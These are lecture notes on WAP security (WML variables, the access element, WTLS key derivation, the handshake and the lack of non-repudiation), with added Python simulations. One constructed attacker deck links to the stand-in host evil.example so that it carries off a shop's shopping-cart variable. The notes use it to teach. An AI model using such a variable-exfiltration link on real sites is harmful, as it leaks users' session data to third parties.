• Authentication certificate: client sends the certificate request using WTLS to the PKI portal; Proof of Possession (POP) by WTLS.
• Signature certificate: client signs text for POP.
• Delivery: the certificate itself, an LDAP URL or an HTTP URL.

Problem: Variables in WML

WML allows setting and reading of variables in the browser context.

Problem: other decks can read this variable.

    <wml>
      <card id="cart">
        ...
        <onevent type="onenterforward">
          <refresh><setvar name="shopping_cart" value="31415"/></refresh>
        </onevent>
        <do type="accept">
          <go href="http://wap.versand.de/$shopping_cart"/>
        </do>
      </card>
    </wml>

Problem: Variables in WML (cont.)

Solution: the access element restricts which referring decks may enter this deck:

    <wml>
      <head>
        <access domain="wap.versand.de"/>
      </head>
      <card id="cart">
        ...
        <onevent type="onenterforward">
          <refresh><setvar name="shopping_cart" value="31415"/></refresh>
        </onevent>
        <do type="accept">
          <go href="http://wap.versand.de/$shopping_cart"/>
        </do>
      </card>
    </wml>

But: there is no cryptographic authentication of the permitted decks; the check is only on the domain of the referring URL. Variables should not be used for passwords.
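The two points above (variables are shared across decks; the access element checks only a domain name), as an added example that is not part of the lecture. A small browser-context model parses WML decks, runs their setvars, substitutes $variables into hrefs and enforces the access element with the WML 1.x label-suffix domain rule. The shop deck is the slide's example; the attacker's deck, its host evil.example, and the URLs are constructed.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed decks: the slide's shop deck with an access element, and a hypothetical
# attacker's deck on another host that reads the variable the shop deck set.
SHOP_DECK = """<wml>
  <head><access domain="wap.versand.de"/></head>
  <card id="cart">
    <onevent type="onenterforward">
      <refresh><setvar name="shopping_cart" value="31415"/></refresh>
    </onevent>
    <do type="accept"><go href="http://wap.versand.de/$shopping_cart"/></do>
  </card>
</wml>"""

EVIL_DECK = """<wml>
  <card id="steal">
    <do type="accept"><go href="http://evil.example/collect?cart=$(shopping_cart)"/></do>
  </card>
</wml>"""

VAR = re.compile(r"\$(?:\((\w+)\)|(\w+))")   # $name or $(name)


class AccessDenied(Exception):
    pass


def domain_matches(referrer_host: str, allowed: str) -> bool:
    """WML 1.x access-element rule: suffix match on whole domain labels, so
    'www.wapforum.org' matches 'wapforum.org' but 'forum.org' does not."""
    r, a = referrer_host.lower().split("."), allowed.lower().split(".")
    return len(r) >= len(a) and r[-len(a):] == a


class BrowserContext:
    """Variables live in the browser context, not in the deck that set them."""
    def __init__(self):
        self.variables = {}
        self.current_url = None

    def substitute(self, text: str) -> str:
        return VAR.sub(lambda m: self.variables.get(m.group(1) or m.group(2), ""), text)

    def load(self, url: str, wml: str) -> list:
        """Enforce <access domain=...> against the referring deck, run the card's
        onenterforward setvars, and return the resolved hrefs of its <go> tasks."""
        root = ET.fromstring(wml)
        access = root.find("./head/access")
        if access is not None and self.current_url is not None:
            referrer = urlsplit(self.current_url).hostname or ""
            if not domain_matches(referrer, access.get("domain", "")):
                raise AccessDenied(f"{referrer} may not link into {url}")
        self.current_url = url
        card = root.find("card")
        for sv in card.findall("./onevent[@type='onenterforward']/refresh/setvar"):
            self.variables[sv.get("name")] = sv.get("value")
        return [self.substitute(go.get("href")) for go in card.iter("go")]


def leak_demo() -> dict:
    """The user visits the shop, then a deck on another host: that deck reads
    $shopping_cart. The access element only blocks the reverse direction, a foreign
    deck linking into the shop deck, and it trusts the referrer's URL for that."""
    ctx = BrowserContext()
    shop_links = ctx.load("http://wap.versand.de/cart.wml", SHOP_DECK)
    evil_links = ctx.load("http://evil.example/steal.wml", EVIL_DECK)
    try:
        ctx.load("http://wap.versand.de/cart.wml", SHOP_DECK)
        blocked = False
    except AccessDenied:
        blocked = True
    return {"shop": shop_links[0], "evil": evil_links[0], "evil_to_shop_blocked": blocked}
```

Because the check compares domain names and nothing else, anyone who can make the browser believe a deck came from wap.versand.de (a compromised gateway, spoofed DNS at the gateway) passes it; that is the "no cryptographic authentication" caveat, and the reason secrets such as passwords do not belong in WML variables.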

Digital signature within WMLScript

Crypto.signText(text, options, keyIdType, keyId): the text (e.g. a contract) is displayed to the user, signed with the user's signature key and returned as a signed document.

Design goals of WTLS
• Authentication of the communication partner
• Confidentiality of communication data
• Integrity and authenticity of communication data
• Interoperability
• Efficiency
• Extensibility
• But: no non-repudiation

Architecture of WTLS (figure, redrawn): WTLS sits on top of WDP. Its record layer carries four protocols: Handshake, Change Cipher Spec, Alert and Application Data. The PSE (personal security environment) holds the keys and certificates the handshake uses.

WTLS in principle (figure, redrawn)

  Application data:       "Errare humanum est."
  Compression:            compressed form of "Errare ..."
  WTLS record protocol:   cryptogram of "Errare ...", encrypted by a symmetric algorithm and protected by a MAC
  WDP protocol:           the record is handed down to WDP as a datagram


Key derivation (figure, redrawn): Random 1 (client random), Random 2 (server random) and the shared secret (master secret) are fed into a pseudo-random generator which yields 6 symmetric keys:
• Client write key
• Client write MAC secret
• Client IV
• Server write key
• Server write MAC secret
• Server IV

Handshake protocol, option 1: server-only authentication (figure, redrawn)
• Client -> Server (clear data): Client_Hello with Random 1 and a SessionId.
• Server -> Client (clear data): Server_Hello with Random 2 and the server's certificate.
• Client: generates Random 3 and sends it encrypted with the server's public key; client and server are now generating a shared secret.
• Both sides run KeyGen: Random 1, Random 2 and Random 3 are combined into the Master Secret, from which the symmetric keys are derived.
• Both sides send Change Cipher Spec (clear data) and then Finished, the first messages under symmetric encryption.

No non-repudiation (figure, redrawn)
1. Alice: "I cancelled the contract for my flat 3 months ago."
2. Landlord: "I did not receive any message from Alice. The log file has been faked by Alice!" (the WTLS log file is the only evidence)
3. Judge: "Sorry, I cannot decide this!"

Reason: the record protocol is based on symmetric cryptography. Both parties hold the same MAC key, so a logged record with a valid MAC could have been produced by either of them.
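The key-derivation figure and the non-repudiation argument above in code, as an added example that is not part of the lecture. Both ends expand the master secret, the two randoms and a key-refresh sequence number into the six symmetric keys, and the server can then write a record with a valid client MAC into its own log. The PRF is a labelled HMAC-SHA1 stand-in with the interface WTLS uses (WTLS specifies its own single-hash P_hash construction), the per-direction labels and the key order inside each block are assumptions, and all key material here is constructed.

```python
import hmac


def wtls_prf(master_secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """STAND-IN for the WTLS PRF: same interface (secret, label, seed, length) but an
    HMAC-SHA1 counter-mode expansion rather than the spec's exact construction."""
    out = b""
    for i in range((length + 19) // 20):
        out += hmac.new(master_secret, bytes([i]) + label + seed, "sha1").digest()
    return out[:length]


def wtls_keys(master_secret: bytes, client_random: bytes, server_random: bytes,
              seq_num: int = 0, key_len: int = 16, mac_len: int = 20, iv_len: int = 8) -> dict:
    """The six symmetric keys of the figure. Each direction gets its own block, and the
    key-refresh sequence number is part of the seed, so keys can be rolled without a
    new handshake. Order inside a block (MAC secret, write key, IV) is assumed."""
    keys = {}
    for side in ("client", "server"):
        seed = seq_num.to_bytes(2, "big") + server_random + client_random
        block = wtls_prf(master_secret, side.encode() + b" expansion", seed,
                         mac_len + key_len + iv_len)
        keys[side] = {"mac": block[:mac_len],
                      "key": block[mac_len:mac_len + key_len],
                      "iv": block[mac_len + key_len:]}
    return keys


def record_mac(mac_secret: bytes, seq_num: int, content_type: int, payload: bytes,
               truncate: int = 20) -> bytes:
    """Record-layer MAC over sequence number, content type, length and payload.
    WTLS also allowed truncated MACs (e.g. 40 bits); `truncate` models that choice."""
    header = seq_num.to_bytes(2, "big") + bytes([content_type]) + len(payload).to_bytes(2, "big")
    return hmac.new(mac_secret, header + payload, "sha1").digest()[:truncate]


def logfile_proves_nothing(master_secret: bytes, client_random: bytes, server_random: bytes) -> bool:
    """Alice (client) sends 'I cancelled the contract'. The server can place exactly the
    same record, carrying a valid client MAC, in its own log, because the handshake gave
    it the client write MAC secret too. True when the server-forged tag equals Alice's."""
    msg = b"I cancelled the contract for my flat three months ago."
    alice_mac_key = wtls_keys(master_secret, client_random, server_random)["client"]["mac"]
    server_copy = wtls_keys(master_secret, client_random, server_random)["client"]["mac"]
    genuine = record_mac(alice_mac_key, 1, 0x17, msg)
    forged = record_mac(server_copy, 1, 0x17, msg)
    return hmac.compare_digest(genuine, forged)


def key_refresh_changes_keys(master_secret: bytes, client_random: bytes, server_random: bytes) -> bool:
    """Bumping the sequence number yields a fresh key block from the same master secret."""
    return (wtls_keys(master_secret, client_random, server_random, seq_num=0)
            != wtls_keys(master_secret, client_random, server_random, seq_num=1))
```

A third party handed the log can verify the MAC only with the same shared key, which proves that one of the two parties wrote the record, not which one; a signature over the text (Crypto.signText in WMLScript) is what gives the judge something to decide on.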

TLS vs. WTLS

  Property                       TLS          WTLS
  ---------------------------    ---------    -----------------------
  Fragmentation                  yes          no
  Certificates                   X.509        X.509, WTLS or URL
  Cipher suites                  without EC   with EC
  Datagrams                      no           yes
  Handshake via shared secret    no           yes
  Checksum in alerts             no           yes
  Sequence numbers               implicit     implicit or explicit

WAP summary
• WAP mixes too many levels.
• Specs are unclear in many areas concerning security-sensitive issues.
• The WAP gateway is exposed to multiple kinds of attack.
• User-interface interpretation is very difficult on mobile devices.